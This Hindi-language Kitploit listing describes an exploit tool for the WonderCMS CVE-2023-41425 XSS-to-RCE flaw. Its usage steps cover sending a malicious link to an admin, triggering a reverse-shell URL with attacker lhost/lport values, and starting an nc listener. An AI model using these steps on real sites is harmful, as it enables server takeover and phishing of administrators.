Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Xss इंजेक्शन, WonderCMS 3.2.0 -3.4.2 | Kitploit
उपकरण/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
फ़िशिंग उपकरणपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-41425-WonderCMS-Authenticated-RCE

Xss इंजेक्शन, WonderCMS 3.2.0 -3.4.2

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-41425-WonderCMS-प्रमाणित-RCE

विवरण

WonderCMS v3.2.0 - v3.4.2 असुरक्षित है। दूरस्थ हमलावर क्रॉस-साइट स्क्रिप्टिंग (XSS) शोषण का उपयोग करके सर्वर का पूर्ण नियंत्रण प्राप्त कर सकते हैं (केवल शैक्षिक उद्देश्यों के लिए )। यहाँ खेल की योजना है:

यह कैसे काम करता है:

शोषण WonderCMS के installModule घटक का दुरुपयोग करके एक तैयार स्क्रिप्ट को चुपके से डालता है जो मनमाना कोड चलाता है।

सेटअप

  • Tool: exploit.py
  • आपको क्या चाहिए:
    • लक्ष्य URL जहाँ WonderCMS स्थापित है (कोई व्यवस्थापक पासवर्ड आवश्यक नहीं)।
    • आपके हमलावर मशीन का IP।
    • आपके रिवर्स शेल श्रोता के लिए एक पोर्ट।

चरण-दर-चरण निष्पादन

  1. स्क्रिप्ट xss.js नामक एक फ़ाइल उत्पन्न करती है। यह JavaScript हथियार रिफ्लेक्टेड XSS का शोषण करने के लिए डिज़ाइन किया गया है।
  2. यह एक दुर्भावनापूर्ण लिंक आउटपुट करता है। आप इसे व्यवस्थापक को भेजेंगे।
  3. जादू तब होता है जब व्यवस्थापक (एक लॉग-इन उपयोगकर्ता) आपका लिंक खोलता है या उस पर क्लिक करता है:
  • उनकी सहमति के बिना पृष्ठभूमि अनुरोध चलते हैं।
  • थीम/प्लगइन अपलोड सुविधा का उपयोग करके एक रिवर्स शेल पेलोड अपलोड किया जाता है।
  1. अपलोड होने के बाद, पेलोड निष्पादित होता है और आपको सीधे लक्ष्य सर्वर से रिवर्स शेल कनेक्शन प्रदान करता है।
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

उदाहरण

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

विफल-सुरक्षित:

यदि रिवर्स शेल स्वचालित रूप से ट्रिगर नहीं होता है, तो बस यहाँ जाएँ:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

नोट:

निम्नलिखित कमांड का उपयोग करके एक श्रोता प्रारंभ करना याद रखें:

root@kitploit:~
nc -lvp 4444

श्रेय

prodigiousMind द्वारा कमजोरी की खोज और रिपोर्ट करने के लिए https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

टूल डाउनलोड करें